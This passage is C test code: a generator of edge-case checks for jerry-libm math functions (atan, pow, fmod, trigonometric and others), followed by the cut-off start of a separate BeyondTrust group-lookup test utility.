  GEN_DBL_TEST (atan (18.9 / 16.0));
  GEN_DBL_TEST (atan (-18.9 / 16.0));
  GEN_DBL_TEST (atan (19.1 / 16.0));
  GEN_DBL_TEST (atan (-19.1 / 16.0));
  GEN_DBL_TEST (atan (38.9 / 16.0));
  GEN_DBL_TEST (atan (-38.9 / 16.0));
  GEN_DBL_TEST (atan (39.1 / 16.0));
  GEN_DBL_TEST (atan (-39.1 / 16.0));
  GEN_DBL_TEST (atan (0.99));
  GEN_DBL_TEST (atan (-0.99));
  GEN_DBL_TEST (atan (1.1));
  GEN_DBL_TEST (atan (-1.1));
  GEN_DBL_TEST (atan (7.37e+19));
  GEN_DBL_TEST (atan (-7.37e+19));
  GEN_DBL_TEST (atan (7.38e+19));
  GEN_DBL_TEST (atan (-7.38e+19));
  GEN_DBL_TEST (atan (0.7));
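  /* Note (added for clarity; not in the original source): the x / 16.0 probe
   * values above bracket the range-reduction breakpoints of the
   * fdlibm-derived atan implementation, which switches approximation
   * intervals at |x| = 7/16, 11/16, 19/16 and 39/16; each threshold is
   * exercised just below, at, and just above the boundary. */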
  /* atan2 tests */
  GEN_DBL_TEST (atan2 (NAN, NAN));
  GEN_DBL_TEST (atan2 (0.0, NAN));
  GEN_DBL_TEST (atan2 (-0.0, NAN));
  GEN_DBL_TEST (atan2 (1.0, NAN));
  GEN_DBL_TEST (atan2 (-1.0, NAN));
  GEN_DBL_TEST (atan2 (INFINITY, NAN));
  GEN_DBL_TEST (atan2 (-INFINITY, NAN));
  GEN_DBL_TEST (atan2 (NAN, 0.0));
  GEN_DBL_TEST (atan2 (NAN, -0.0));
  GEN_DBL_TEST (atan2 (NAN, 1.0));
  GEN_DBL_TEST (atan2 (NAN, -1.0));
  GEN_DBL_TEST (atan2 (NAN, INFINITY));
  GEN_DBL_TEST (atan2 (NAN, -INFINITY));
  GEN_DBL_TEST (atan2 (0.0, 0.0));
  GEN_DBL_TEST (atan2 (0.0, -0.0));
  GEN_DBL_TEST (atan2 (-0.0, 0.0));
  GEN_DBL_TEST (atan2 (-0.0, -0.0));
  GEN_DBL_TEST (atan2 (0.0, 1.0));
  GEN_DBL_TEST (atan2 (0.0, -1.0));
  GEN_DBL_TEST (atan2 (0.0, INFINITY));
  GEN_DBL_TEST (atan2 (0.0, -INFINITY));
  GEN_DBL_TEST (atan2 (-0.0, 1.0));
  GEN_DBL_TEST (atan2 (-0.0, -1.0));
  GEN_DBL_TEST (atan2 (-0.0, INFINITY));
  GEN_DBL_TEST (atan2 (-0.0, -INFINITY));
  GEN_DBL_TEST (atan2 (1.0, 0.0));
  GEN_DBL_TEST (atan2 (1.0, -0.0));
  GEN_DBL_TEST (atan2 (INFINITY, 0.0));
  GEN_DBL_TEST (atan2 (INFINITY, -0.0));
  GEN_DBL_TEST (atan2 (-1.0, 0.0));
  GEN_DBL_TEST (atan2 (-1.0, -0.0));
  GEN_DBL_TEST (atan2 (-INFINITY, 0.0));
  GEN_DBL_TEST (atan2 (-INFINITY, -0.0));
  GEN_DBL_TEST (atan2 (1.0, INFINITY));
  GEN_DBL_TEST (atan2 (-1.0, INFINITY));
  GEN_DBL_TEST (atan2 (1.0, -INFINITY));
  GEN_DBL_TEST (atan2 (-1.0, -INFINITY));
  GEN_DBL_TEST (atan2 (INFINITY, INFINITY));
  GEN_DBL_TEST (atan2 (INFINITY, -INFINITY));
  GEN_DBL_TEST (atan2 (-INFINITY, INFINITY));
  GEN_DBL_TEST (atan2 (-INFINITY, -INFINITY));
  GEN_DBL_TEST (atan2 (INFINITY, 1.0));
  GEN_DBL_TEST (atan2 (INFINITY, -1.0));
  GEN_DBL_TEST (atan2 (-INFINITY, 1.0));
  GEN_DBL_TEST (atan2 (-INFINITY, -1.0));
  GEN_DBL_TEST (atan2 (0.7, 1.0));
  GEN_DBL_TEST (atan2 (-0.7, 1.0));
  GEN_DBL_TEST (atan2 (0.7, -1.0));
  GEN_DBL_TEST (atan2 (-0.7, -1.0));
  GEN_DBL_TEST (atan2 (0.4, 0.0003));
  GEN_DBL_TEST (atan2 (1.4, -0.93));

  /* ceil tests */
  GEN_DBL_TEST (ceil (0.0));
  GEN_DBL_TEST (ceil (-0.0));
  GEN_DBL_TEST (ceil (INFINITY));
  GEN_DBL_TEST (ceil (-INFINITY));
  GEN_DBL_TEST (ceil (NAN));
  GEN_DBL_TEST (ceil (3.14));
  GEN_DBL_TEST (ceil (-3.14));
  GEN_DBL_TEST (ceil (3.72e-09));
  GEN_DBL_TEST (ceil (-3.72e-09));
  GEN_DBL_TEST (ceil (7.37e+19));
  GEN_DBL_TEST (ceil (-7.37e+19));
GEN_DBL_TEST (copysign (NAN, 0.0)); GEN_DBL_TEST (copysign (NAN, -0.0)); GEN_DBL_TEST (copysign (NAN, 1.0)); GEN_DBL_TEST (copysign (NAN, -1.0)); GEN_DBL_TEST (copysign (NAN, INFINITY)); GEN_DBL_TEST (copysign (NAN, -INFINITY)); GEN_DBL_TEST (copysign (NAN, NAN)); GEN_DBL_TEST (copysign (3.14, -1.0)); GEN_DBL_TEST (copysign (-3.14, 1.0)); GEN_DBL_TEST (copysign (1.0, -3.14)); GEN_DBL_TEST (copysign (-1.0, 3.14)); */ /* exp tests */ GEN_DBL_TEST (exp (0.0)); GEN_DBL_TEST (exp (-0.0)); GEN_DBL_TEST (exp (1.0)); GEN_DBL_TEST (exp (-1.0)); GEN_DBL_TEST (exp (INFINITY)); GEN_DBL_TEST (exp (-INFINITY)); GEN_DBL_TEST (exp (NAN)); GEN_DBL_TEST (exp (7.08e+02)); GEN_DBL_TEST (exp (7.10e+02)); GEN_DBL_TEST (exp (-7.40e+02)); GEN_DBL_TEST (exp (-7.50e+02)); GEN_DBL_TEST (exp (0.34)); GEN_DBL_TEST (exp (-0.34)); GEN_DBL_TEST (exp (0.35)); GEN_DBL_TEST (exp (-0.35)); GEN_DBL_TEST (exp (1.03)); GEN_DBL_TEST (exp (-1.03)); GEN_DBL_TEST (exp (1.04)); GEN_DBL_TEST (exp (-1.04)); GEN_DBL_TEST (exp (3.72e-09)); GEN_DBL_TEST (exp (-3.72e-09)); GEN_DBL_TEST (exp (3.73e-09)); GEN_DBL_TEST (exp (-3.73e-09)); GEN_DBL_TEST (exp (2.0)); GEN_DBL_TEST (exp (3.0)); GEN_DBL_TEST (exp (0.7)); GEN_DBL_TEST (exp (38.0)); /* fabs tests */ GEN_DBL_TEST (fabs (0.0)); GEN_DBL_TEST (fabs (-0.0)); GEN_DBL_TEST (fabs (1.0)); GEN_DBL_TEST (fabs (-1.0)); GEN_DBL_TEST (fabs (INFINITY)); GEN_DBL_TEST (fabs (-INFINITY)); GEN_DBL_TEST (fabs (NAN)); GEN_DBL_TEST (fabs (3.14)); GEN_DBL_TEST (fabs (-3.14)); GEN_DBL_TEST (fabs (0.7)); GEN_DBL_TEST (fabs (-0.7)); GEN_DBL_TEST (fabs (3.72e-09)); GEN_DBL_TEST (fabs (-3.72e-09)); GEN_DBL_TEST (fabs (7.37e+19)); GEN_DBL_TEST (fabs (-7.37e+19)); /* finite tests */ /* SKIPPED: not publicly declared in jerry-libm GEN_INT_TEST (finite (0.0)); GEN_INT_TEST (finite (-0.0)); GEN_INT_TEST (finite (1.0)); GEN_INT_TEST (finite (-1.0)); GEN_INT_TEST (finite (INFINITY)); GEN_INT_TEST (finite (-INFINITY)); GEN_INT_TEST (finite (NAN)); GEN_INT_TEST (finite (3.14)); GEN_INT_TEST (finite (-3.14)); GEN_INT_TEST (finite (0.7)); GEN_INT_TEST (finite (-0.7)); GEN_INT_TEST (finite (3.72e-09)); GEN_INT_TEST (finite (-3.72e-09)); GEN_INT_TEST (finite (7.37e+19)); GEN_INT_TEST (finite (-7.37e+19)); */ /* floor tests */ GEN_DBL_TEST (floor (0.0)); GEN_DBL_TEST (floor (-0.0)); GEN_DBL_TEST (floor (INFINITY)); GEN_DBL_TEST (floor (-INFINITY)); GEN_DBL_TEST (floor (NAN)); GEN_DBL_TEST (floor (3.14)); GEN_DBL_TEST (floor (-3.14)); GEN_DBL_TEST (floor (3.72e-09)); GEN_DBL_TEST (floor (-3.72e-09)); GEN_DBL_TEST (floor (7.37e+19)); GEN_DBL_TEST (floor (-7.37e+19)); /* fmod tests */ GEN_DBL_TEST (fmod (0.0, 0.0)); GEN_DBL_TEST (fmod (0.0, -0.0)); GEN_DBL_TEST (fmod (-0.0, 0.0)); GEN_DBL_TEST (fmod (-0.0, -0.0)); GEN_DBL_TEST (fmod (0.0, 3.0)); GEN_DBL_TEST (fmod (0.0, -3.0)); GEN_DBL_TEST (fmod (-0.0, 3.0)); GEN_DBL_TEST (fmod (-0.0, -3.0)); GEN_DBL_TEST (fmod (0.0, INFINITY)); GEN_DBL_TEST (fmod (0.0, -INFINITY)); GEN_DBL_TEST (fmod (-0.0, INFINITY)); GEN_DBL_TEST (fmod (-0.0, -INFINITY)); GEN_DBL_TEST (fmod (0.0, NAN)); GEN_DBL_TEST (fmod (-0.0, NAN)); GEN_DBL_TEST (fmod (3.0, 0.0)); GEN_DBL_TEST (fmod (3.0, -0.0)); GEN_DBL_TEST (fmod (-3.0, 0.0)); GEN_DBL_TEST (fmod (-3.0, -0.0)); GEN_DBL_TEST (fmod (3.0, 3.0)); GEN_DBL_TEST (fmod (3.0, -3.0)); GEN_DBL_TEST (fmod (-3.0, 3.0)); GEN_DBL_TEST (fmod (-3.0, -3.0)); GEN_DBL_TEST (fmod (3.0, INFINITY)); GEN_DBL_TEST (fmod (3.0, -INFINITY)); GEN_DBL_TEST (fmod (-3.0, INFINITY)); GEN_DBL_TEST (fmod (-3.0, -INFINITY)); GEN_DBL_TEST (fmod (3.0, NAN)); GEN_DBL_TEST (fmod (-3.0, NAN)); 
GEN_DBL_TEST (fmod (INFINITY, 0.0)); GEN_DBL_TEST (fmod (INFINITY, -0.0)); GEN_DBL_TEST (fmod (-INFINITY, 0.0)); GEN_DBL_TEST (fmod (-INFINITY, -0.0)); GEN_DBL_TEST (fmod (INFINITY, 3.0)); GEN_DBL_TEST (fmod (INFINITY, -3.0)); GEN_DBL_TEST (fmod (-INFINITY, 3.0)); GEN_DBL_TEST (fmod (-INFINITY, -3.0)); GEN_DBL_TEST (fmod (INFINITY, INFINITY)); GEN_DBL_TEST (fmod (INFINITY, -INFINITY)); GEN_DBL_TEST (fmod (-INFINITY, INFINITY)); GEN_DBL_TEST (fmod (-INFINITY, -INFINITY)); GEN_DBL_TEST (fmod (INFINITY, NAN)); GEN_DBL_TEST (fmod (-INFINITY, NAN)); GEN_DBL_TEST (fmod (NAN, 0.0)); GEN_DBL_TEST (fmod (NAN, -0.0)); GEN_DBL_TEST (fmod (NAN, 3.0)); GEN_DBL_TEST (fmod (NAN, -3.0)); GEN_DBL_TEST (fmod (NAN, INFINITY)); GEN_DBL_TEST (fmod (NAN, -INFINITY)); GEN_DBL_TEST (fmod (NAN, NAN)); GEN_DBL_TEST (fmod (3.0, 1.0)); GEN_DBL_TEST (fmod (3.0, -1.0)); GEN_DBL_TEST (fmod (-3.0, 1.0)); GEN_DBL_TEST (fmod (-3.0, -1.0)); GEN_DBL_TEST (fmod (6.5, 2.3)); GEN_DBL_TEST (fmod (6.5, -2.3)); GEN_DBL_TEST (fmod (-6.5, 2.3)); GEN_DBL_TEST (fmod (-6.5, -2.3)); /* isnan tests */ GEN_INT_TEST (isnan (0.0)); GEN_INT_TEST (isnan (-0.0)); GEN_INT_TEST (isnan (1.0)); GEN_INT_TEST (isnan (-1.0)); GEN_INT_TEST (isnan (INFINITY)); GEN_INT_TEST (isnan (-INFINITY)); GEN_INT_TEST (isnan (NAN)); GEN_INT_TEST (isnan (3.14)); GEN_INT_TEST (isnan (-3.14)); GEN_INT_TEST (isnan (0.7)); GEN_INT_TEST (isnan (-0.7)); GEN_INT_TEST (isnan (3.72e-09)); GEN_INT_TEST (isnan (-3.72e-09)); GEN_INT_TEST (isnan (7.37e+19)); GEN_INT_TEST (isnan (-7.37e+19)); /* log tests */ GEN_DBL_TEST (log (0.0)); GEN_DBL_TEST (log (-0.0)); GEN_DBL_TEST (log (1.0)); GEN_DBL_TEST (log (-1.0)); GEN_DBL_TEST (log (INFINITY)); GEN_DBL_TEST (log (-INFINITY)); GEN_DBL_TEST (log (NAN)); GEN_DBL_TEST (log (M_E)); GEN_DBL_TEST (log (1.0 / M_E)); GEN_DBL_TEST (log (2)); GEN_DBL_TEST (log (10)); GEN_DBL_TEST (log (0.7)); GEN_DBL_TEST (log (2.22e-308)); GEN_DBL_TEST (log (2.23e-308)); GEN_DBL_TEST (log (0.17)); GEN_DBL_TEST (log (0.18)); GEN_DBL_TEST (log (1999.0)); GEN_DBL_TEST (log (2000.0)); GEN_DBL_TEST (log (2001.0)); /* pow tests */ GEN_DBL_TEST (pow (0.0, 0.0)); GEN_DBL_TEST (pow (0.0, -0.0)); GEN_DBL_TEST (pow (-0.0, 0.0)); GEN_DBL_TEST (pow (-0.0, -0.0)); GEN_DBL_TEST (pow (0.0, 1.0)); GEN_DBL_TEST (pow (0.0, -1.0)); GEN_DBL_TEST (pow (-0.0, 1.0)); GEN_DBL_TEST (pow (-0.0, -1.0)); GEN_DBL_TEST (pow (0.0, INFINITY)); GEN_DBL_TEST (pow (0.0, -INFINITY)); GEN_DBL_TEST (pow (-0.0, INFINITY)); GEN_DBL_TEST (pow (-0.0, -INFINITY)); GEN_DBL_TEST (pow (0.0, NAN)); GEN_DBL_TEST (pow (-0.0, NAN)); GEN_DBL_TEST (pow (1.0, 0.0)); GEN_DBL_TEST (pow (1.0, -0.0)); GEN_DBL_TEST (pow (-1.0, 0.0)); GEN_DBL_TEST (pow (-1.0, -0.0)); GEN_DBL_TEST (pow (1.0, 1.0)); GEN_DBL_TEST (pow (1.0, -1.0)); GEN_DBL_TEST (pow (-1.0, 1.0)); GEN_DBL_TEST (pow (-1.0, -1.0)); GEN_DBL_TEST (pow (1.0, INFINITY)); GEN_DBL_TEST (pow (1.0, -INFINITY)); GEN_DBL_TEST (pow (-1.0, INFINITY)); GEN_DBL_TEST (pow (-1.0, -INFINITY)); GEN_DBL_TEST (pow (1.0, NAN)); GEN_DBL_TEST (pow (-1.0, NAN)); GEN_DBL_TEST (pow (INFINITY, 0.0)); GEN_DBL_TEST (pow (INFINITY, -0.0)); GEN_DBL_TEST (pow (-INFINITY, 0.0)); GEN_DBL_TEST (pow (-INFINITY, -0.0)); GEN_DBL_TEST (pow (INFINITY, 1.0)); GEN_DBL_TEST (pow (INFINITY, -1.0)); GEN_DBL_TEST (pow (-INFINITY, 1.0)); GEN_DBL_TEST (pow (-INFINITY, -1.0)); GEN_DBL_TEST (pow (INFINITY, INFINITY)); GEN_DBL_TEST (pow (INFINITY, -INFINITY)); GEN_DBL_TEST (pow (-INFINITY, INFINITY)); GEN_DBL_TEST (pow (-INFINITY, -INFINITY)); GEN_DBL_TEST (pow (INFINITY, NAN)); GEN_DBL_TEST (pow 
(-INFINITY, NAN)); GEN_DBL_TEST (pow (NAN, 0.0)); GEN_DBL_TEST (pow (NAN, -0.0)); GEN_DBL_TEST (pow (NAN, 1.0)); GEN_DBL_TEST (pow (NAN, -1.0)); GEN_DBL_TEST (pow (NAN, INFINITY)); GEN_DBL_TEST (pow (NAN, -INFINITY)); GEN_DBL_TEST (pow (NAN, NAN)); GEN_DBL_TEST (pow (0.9, INFINITY)); GEN_DBL_TEST (pow (0.9, -INFINITY)); GEN_DBL_TEST (pow (-0.9, INFINITY)); GEN_DBL_TEST (pow (-0.9, -INFINITY)); GEN_DBL_TEST (pow (1.1, INFINITY)); GEN_DBL_TEST (pow (1.1, -INFINITY)); GEN_DBL_TEST (pow (-1.1, INFINITY)); GEN_DBL_TEST (pow (-1.1, -INFINITY)); GEN_DBL_TEST (pow (0.0, 2.0)); GEN_DBL_TEST (pow (0.0, -2.0)); GEN_DBL_TEST (pow (-0.0, 2.0)); GEN_DBL_TEST (pow (-0.0, -2.0)); GEN_DBL_TEST (pow (0.0, 3.0)); GEN_DBL_TEST (pow (0.0, -3.0)); GEN_DBL_TEST (pow (-0.0, 3.0)); GEN_DBL_TEST (pow (-0.0, -3.0)); GEN_DBL_TEST (pow (0.0, 3.14)); GEN_DBL_TEST (pow (0.0, -3.14)); GEN_DBL_TEST (pow (-0.0, 3.14)); GEN_DBL_TEST (pow (-0.0, -3.14)); GEN_DBL_TEST (pow (1.0, 3.14)); GEN_DBL_TEST (pow (1.0, -3.14)); GEN_DBL_TEST (pow (-1.0, 3.14)); GEN_DBL_TEST (pow (-1.0, -3.14)); GEN_DBL_TEST (pow (3.14, 0.0)); GEN_DBL_TEST (pow (3.14, -0.0)); GEN_DBL_TEST (pow (-3.14, 0.0)); GEN_DBL_TEST (pow (-3.14, -0.0)); GEN_DBL_TEST (pow (3.14, 1.0)); GEN_DBL_TEST (pow (3.14, -1.0)); GEN_DBL_TEST (pow (-3.14, 1.0)); GEN_DBL_TEST (pow (-3.14, -1.0)); GEN_DBL_TEST (pow (3.14, 2.0)); GEN_DBL_TEST (pow (3.14, -2.0)); GEN_DBL_TEST (pow (-3.14, 2.0)); GEN_DBL_TEST (pow (-3.14, -2.0)); GEN_DBL_TEST (pow (3.14, 3.0)); GEN_DBL_TEST (pow (3.14, -3.0)); GEN_DBL_TEST (pow (-3.14, 3.0)); GEN_DBL_TEST (pow (-3.14, -3.0)); GEN_DBL_TEST (pow (3.14, 3.14)); GEN_DBL_TEST (pow (3.14, -3.14)); GEN_DBL_TEST (pow (-3.14, 3.14)); GEN_DBL_TEST (pow (-3.14, -3.14)); GEN_DBL_TEST (pow (INFINITY, 2.0)); GEN_DBL_TEST (pow (INFINITY, -2.0)); GEN_DBL_TEST (pow (-INFINITY, 2.0)); GEN_DBL_TEST (pow (-INFINITY, -2.0)); GEN_DBL_TEST (pow (INFINITY, 3.0)); GEN_DBL_TEST (pow (INFINITY, -3.0)); GEN_DBL_TEST (pow (-INFINITY, 3.0)); GEN_DBL_TEST (pow (-INFINITY, -3.0)); GEN_DBL_TEST (pow (INFINITY, 3.14)); GEN_DBL_TEST (pow (INFINITY, -3.14)); GEN_DBL_TEST (pow (-INFINITY, 3.14)); GEN_DBL_TEST (pow (-INFINITY, -3.14)); GEN_DBL_TEST (pow (0.7, 1.2)); /* scalbn tests */ /* SKIPPED: not publicly declared in jerry-libm GEN_DBL_TEST (scalbn (0.0, 0)); GEN_DBL_TEST (scalbn (-0.0, 0)); GEN_DBL_TEST (scalbn (0.0, 1)); GEN_DBL_TEST (scalbn (0.0, -1)); GEN_DBL_TEST (scalbn (-0.0, 1)); GEN_DBL_TEST (scalbn (-0.0, -1)); GEN_DBL_TEST (scalbn (1.0, 0)); GEN_DBL_TEST (scalbn (-1.0, 0)); GEN_DBL_TEST (scalbn (1.0, 1)); GEN_DBL_TEST (scalbn (1.0, -1)); GEN_DBL_TEST (scalbn (-1.0, 1)); GEN_DBL_TEST (scalbn (-1.0, -1)); GEN_DBL_TEST (scalbn (INFINITY, 0)); GEN_DBL_TEST (scalbn (-INFINITY, 0)); GEN_DBL_TEST (scalbn (INFINITY, 1)); GEN_DBL_TEST (scalbn (INFINITY, -1)); GEN_DBL_TEST (scalbn (-INFINITY, 1)); GEN_DBL_TEST (scalbn (-INFINITY, -1)); GEN_DBL_TEST (scalbn (NAN, 0)); GEN_DBL_TEST (scalbn (NAN, 1)); GEN_DBL_TEST (scalbn (NAN, -1)); GEN_DBL_TEST (scalbn (3.14, -1)); GEN_DBL_TEST (scalbn (-3.14, 1)); GEN_DBL_TEST (scalbn (0.7, 4)); GEN_DBL_TEST (scalbn (0.7, -4)); GEN_DBL_TEST (scalbn (-0.7, 4)); GEN_DBL_TEST (scalbn (-0.7, -4)); GEN_DBL_TEST (scalbn (0.8, 5)); GEN_DBL_TEST (scalbn (0.8, -5)); GEN_DBL_TEST (scalbn (-0.8, 5)); GEN_DBL_TEST (scalbn (-0.8, -5)); GEN_DBL_TEST (scalbn (5.55e-18, 49999)); GEN_DBL_TEST (scalbn (5.55e-18, 50000)); GEN_DBL_TEST (scalbn (5.55e-18, 50001)); GEN_DBL_TEST (scalbn (1.0, -49999)); GEN_DBL_TEST (scalbn (1.0, -50000)); GEN_DBL_TEST (scalbn (1.0, 
-50001)); */ /* sqrt tests */ GEN_DBL_TEST (sqrt (0.0)); GEN_DBL_TEST (sqrt (-0.0)); GEN_DBL_TEST (sqrt (1.0)); GEN_DBL_TEST (sqrt (-1.0)); GEN_DBL_TEST (sqrt (INFINITY)); GEN_DBL_TEST (sqrt (-INFINITY)); GEN_DBL_TEST (sqrt (NAN)); GEN_DBL_TEST (sqrt (0.7)); GEN_DBL_TEST (sqrt (2)); GEN_DBL_TEST (sqrt (10)); GEN_DBL_TEST (sqrt (2.22e-308)); GEN_DBL_TEST (sqrt (2.23e-308)); GEN_DBL_TEST (sqrt (3.72e-09)); GEN_DBL_TEST (sqrt (7.37e+19)); GEN_DBL_TEST (sqrt (2209)); GEN_DBL_TEST (sqrt (4)); GEN_DBL_TEST (sqrt (0.25)); GEN_DBL_TEST (sqrt (6642.25)); GEN_DBL_TEST (sqrt (15239.9025)); /* sin tests */ GEN_DBL_TEST (sin (0.0)); GEN_DBL_TEST (sin (-0.0)); GEN_DBL_TEST (sin (1.0)); GEN_DBL_TEST (sin (-1.0)); GEN_DBL_TEST (sin (INFINITY)); GEN_DBL_TEST (sin (-INFINITY)); GEN_DBL_TEST (sin (NAN)); GEN_DBL_TEST (sin (M_PI)); GEN_DBL_TEST (sin (-M_PI)); GEN_DBL_TEST (sin (2.0 * M_PI)); GEN_DBL_TEST (sin (-2.0 * M_PI)); GEN_DBL_TEST (sin (M_PI / 2.0)); GEN_DBL_TEST (sin (-M_PI / 2.0)); GEN_DBL_TEST (sin (M_PI / 3.0)); GEN_DBL_TEST (sin (-M_PI / 3.0)); GEN_DBL_TEST (sin (M_PI / 4.0)); GEN_DBL_TEST (sin (-M_PI / 4.0)); GEN_DBL_TEST (sin (M_PI / 6.0)); GEN_DBL_TEST (sin (-M_PI / 6.0)); GEN_DBL_TEST (sin (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (sin (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (sin (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (sin (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (sin (6.9e-18)); GEN_DBL_TEST (sin (-6.9e-18)); GEN_DBL_TEST (sin (7.0e-18)); GEN_DBL_TEST (sin (-7.0e-18)); GEN_DBL_TEST (sin (7.4e-9)); GEN_DBL_TEST (sin (-7.4e-9)); GEN_DBL_TEST (sin (7.5e-9)); GEN_DBL_TEST (sin (-7.5e-9)); GEN_DBL_TEST (sin (0.2)); GEN_DBL_TEST (sin (-0.2)); GEN_DBL_TEST (sin (0.4)); GEN_DBL_TEST (sin (-0.4)); GEN_DBL_TEST (sin (0.7)); GEN_DBL_TEST (sin (-0.7)); GEN_DBL_TEST (sin (0.8)); GEN_DBL_TEST (sin (-0.8)); GEN_DBL_TEST (sin (3.0)); GEN_DBL_TEST (sin (-3.0)); GEN_DBL_TEST (sin (4.0)); GEN_DBL_TEST (sin (-4.0)); GEN_DBL_TEST (sin (6.0)); GEN_DBL_TEST (sin (-6.0)); GEN_DBL_TEST (sin (7.0)); GEN_DBL_TEST (sin (-7.0)); /* cos tests */ GEN_DBL_TEST (cos (0.0)); GEN_DBL_TEST (cos (-0.0)); GEN_DBL_TEST (cos (1.0)); GEN_DBL_TEST (cos (-1.0)); GEN_DBL_TEST (cos (INFINITY)); GEN_DBL_TEST (cos (-INFINITY)); GEN_DBL_TEST (cos (NAN)); GEN_DBL_TEST (cos (M_PI)); GEN_DBL_TEST (cos (-M_PI)); GEN_DBL_TEST (cos (2.0 * M_PI)); GEN_DBL_TEST (cos (-2.0 * M_PI)); GEN_DBL_TEST (cos (M_PI / 2.0)); GEN_DBL_TEST (cos (-M_PI / 2.0)); GEN_DBL_TEST (cos (M_PI / 3.0)); GEN_DBL_TEST (cos (-M_PI / 3.0)); GEN_DBL_TEST (cos (M_PI / 4.0)); GEN_DBL_TEST (cos (-M_PI / 4.0)); GEN_DBL_TEST (cos (M_PI / 6.0)); GEN_DBL_TEST (cos (-M_PI / 6.0)); GEN_DBL_TEST (cos (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (cos (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (cos (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (cos (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (cos (6.9e-18)); GEN_DBL_TEST (cos (-6.9e-18)); GEN_DBL_TEST (cos (7.0e-18)); GEN_DBL_TEST (cos (-7.0e-18)); GEN_DBL_TEST (cos (7.4e-9)); GEN_DBL_TEST (cos (-7.4e-9)); GEN_DBL_TEST (cos (7.5e-9)); GEN_DBL_TEST (cos (-7.5e-9)); GEN_DBL_TEST (cos (0.2)); GEN_DBL_TEST (cos (-0.2)); GEN_DBL_TEST (cos (0.4)); GEN_DBL_TEST (cos (-0.4)); GEN_DBL_TEST (cos (0.7)); GEN_DBL_TEST (cos (-0.7)); GEN_DBL_TEST (cos (0.8)); GEN_DBL_TEST (cos (-0.8)); GEN_DBL_TEST (cos (3.0)); GEN_DBL_TEST (cos (-3.0)); GEN_DBL_TEST (cos (4.0)); GEN_DBL_TEST (cos (-4.0)); GEN_DBL_TEST (cos (6.0)); GEN_DBL_TEST (cos (-6.0)); GEN_DBL_TEST (cos (7.0)); GEN_DBL_TEST (cos (-7.0)); /* tan tests */ GEN_DBL_TEST (tan (0.0)); GEN_DBL_TEST (tan (-0.0)); GEN_DBL_TEST (tan (1.0)); GEN_DBL_TEST (tan (-1.0)); 
GEN_DBL_TEST (tan (INFINITY)); GEN_DBL_TEST (tan (-INFINITY)); GEN_DBL_TEST (tan (NAN)); GEN_DBL_TEST (tan (M_PI)); GEN_DBL_TEST (tan (-M_PI)); GEN_DBL_TEST (tan (2.0 * M_PI)); GEN_DBL_TEST (tan (-2.0 * M_PI)); GEN_DBL_TEST (tan (M_PI / 2.0)); GEN_DBL_TEST (tan (-M_PI / 2.0)); GEN_DBL_TEST (tan (M_PI / 3.0)); GEN_DBL_TEST (tan (-M_PI / 3.0)); GEN_DBL_TEST (tan (M_PI / 4.0)); GEN_DBL_TEST (tan (-M_PI / 4.0)); GEN_DBL_TEST (tan (M_PI / 6.0)); GEN_DBL_TEST (tan (-M_PI / 6.0)); GEN_DBL_TEST (tan (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (tan (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (tan (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (tan (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (tan (3.7e-9)); GEN_DBL_TEST (tan (-3.7e-9)); GEN_DBL_TEST (tan (3.8e-9)); GEN_DBL_TEST (tan (-3.8e-9)); GEN_DBL_TEST (tan (0.6)); GEN_DBL_TEST (tan (-0.6)); GEN_DBL_TEST (tan (0.7)); GEN_DBL_TEST (tan (-0.7)); GEN_DBL_TEST (tan (3.0)); GEN_DBL_TEST (tan (-3.0)); GEN_DBL_TEST (tan (4.0)); GEN_DBL_TEST (tan (-4.0)); GEN_DBL_TEST (tan (6.0)); GEN_DBL_TEST (tan (-6.0)); GEN_DBL_TEST (tan (7.0)); GEN_DBL_TEST (tan (-7.0)); } /* main */
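/* Editorial note (not part of the original generator): GEN_DBL_TEST and
   GEN_INT_TEST must be defined earlier in this file for main() to compile.
   A minimal sketch of the shape such generator macros usually take, assuming
   they emit one expected-value check per expression against the host libm:

     #define GEN_DBL_TEST(expr) printf ("check_double (%s, %.20e);\n", #expr, (double) (expr))
     #define GEN_INT_TEST(expr) printf ("check_int (%s, %d);\n", #expr, (int) (expr))

   The stringized expression plus the host libm's value gives a baseline that
   jerry-libm results can later be compared against. */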
274465.c
/* Editor Settings: expandtabs and use 4 spaces for indentation * ex: set softtabstop=4 tabstop=8 expandtab shiftwidth=4: * * -*- mode: c, c-basic-offset: 4 -*- */ /* * Copyright © BeyondTrust Software 2004 - 2019 * All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * BEYONDTRUST MAKES THIS SOFTWARE AVAILABLE UNDER OTHER LICENSING TERMS AS * WELL. IF YOU HAVE ENTERED INTO A SEPARATE LICENSE AGREEMENT WITH * BEYONDTRUST, THEN YOU MAY ELECT TO USE THE SOFTWARE UNDER THE TERMS OF THAT * SOFTWARE LICENSE AGREEMENT INSTEAD OF THE TERMS OF THE APACHE LICENSE, * NOTWITHSTANDING THE ABOVE NOTICE. IF YOU HAVE QUESTIONS, OR WISH TO REQUEST * A COPY OF THE ALTERNATE LICENSING TERMS OFFERED BY BEYONDTRUST, PLEASE CONTACT * BEYONDTRUST AT beyondtrust.com/contact */ #define _POSIX_PTHREAD_SEMANTICS 1 #include "config.h" #include "lsasystem.h" #include "lsadef.h" #include "lsa/lsa.h" #include "lwmem.h" #include "lwstr.h" #include "lwsecurityidentifier.h" #include "lsautils.h" static void ShowUsage() { printf("Usage: test-getgracct idtogroup <gid>\n"); } static int ParseArgs( int argc, char* argv[], gid_t* gid ) { PSTR pszCommand = NULL; PSTR pszGid = NULL; if( argc != 3 ) { ShowUsage(); exit(1); } pszCommand = argv[1]; if( strcmp(pszCommand, "idtogroup")!=0 ) { ShowUsage(); exit(1); } pszGid = argv[2]; *gid = (gid_t) 